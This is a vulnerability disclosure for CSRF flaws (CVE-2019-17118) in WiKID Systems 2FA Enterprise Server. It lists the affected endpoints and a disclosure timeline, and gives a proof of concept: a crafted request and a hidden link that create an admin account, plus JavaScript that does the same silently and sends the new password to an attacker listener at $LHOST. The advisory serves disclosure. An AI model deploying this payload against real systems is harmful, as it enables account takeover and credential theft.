WiKID Systems 2FA Enterprise Server CSRF

Multiple Cross-Site Request Forgery issues, CVE-2019-17118, were identified on WiKID Systems 2FA Enterprise Server through version 4.2.0-b2053.


CVE-2019-17118

Multiple Cross-Site Request Forgery (CSRF) issues, CVE-2019-17118, were identified in WiKID Systems 2FA Enterprise Server through version 4.2.0-b2053. The application did not implement any form of CSRF prevention; consequently, every state-changing request was potentially vulnerable. A sample of affected requests includes:

  • adm_usrs.jsp?action=add
  • adm_usrs.jsp?action=Delete
  • processDeviceStatus.jsp?action=Update
  • processDeviceStatus.jsp?action=Disable
  • processDeviceStatus.jsp?action=Enable
  • processDeviceStatus.jsp?action=Delete
  • groups.jsp?groupAction=Add
  • groups.jsp?groupAction=Delete

Patch

Timeline

  • 26 Sep 2019 - Issue discovered on WiKID Systems 2FA Enterprise Server 4.2.0-b2032
  • 29 Sep 2019 - Issue disclosed to WiKID Systems
  • 09 Oct 2019 - Issue confirmed by WiKID Systems, Patch released
  • 16 Oct 2019 - Public Disclosure

Description

Walking through the application revealed that its requests carried no form of CSRF protection. For example, the request to create an admin user is:

GET /WiKIDAdmin/adm_usrs.jsp?usr=test&newpass1=password1&newpass2=password1&action=Add HTTP/1.1
Host: $RHOST
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=$COOKIE
Connection: close
Upgrade-Insecure-Requests: 1

Nothing in the request proves that the authenticated user intended the action; the session cookie alone is enough for the server to accept it.

This request could be hidden in a link on a page:

<a href="https://$RHOST/WiKIDAdmin/adm_usrs.jsp?usr=pentest&newpass1=password1&newpass2=password1&action=Add">WiKIDAdmin Manual</a>

Or in JavaScript that will execute silently in the background:

<html>
 <body>
 <script>
 // Report the generated password to the attacker's listener at $LHOST.
 function notify(randomstring)
 {
  var xhr = new XMLHttpRequest();
  xhr.open("GET", "https://$LHOST?pass=" + randomstring, true);
  xhr.send();
 }

 // Issue the unprotected admin-creation request; withCredentials makes the
 // browser attach the victim's existing JSESSIONID cookie.
 function addUser()
 {
  var randomstring = Math.random().toString(36).slice(-12);
  var xhr = new XMLHttpRequest();
  xhr.open("GET", "https://$RHOST/WiKIDAdmin/adm_usrs.jsp?usr=pentest&newpass1=" + randomstring + "&newpass2=" + randomstring + "&action=Add", true);
  xhr.withCredentials = true;
  xhr.send();
  notify(randomstring);
 }
 addUser();
 </script>
 </body>
</html>

If a user who is authenticated to the WiKID 2FA Enterprise Server application visits the malicious page, a new admin will be created.

The following output from the attacker's listener demonstrates a user visiting the malicious page, csrf.html, followed by the unintentional background requests that create an admin and send the attacker the password for the new account:

$RHOST - - [14/Oct/2019 04:44:17] "GET /?pass=0.xhd2htmjz1 HTTP/1.1" 200 -
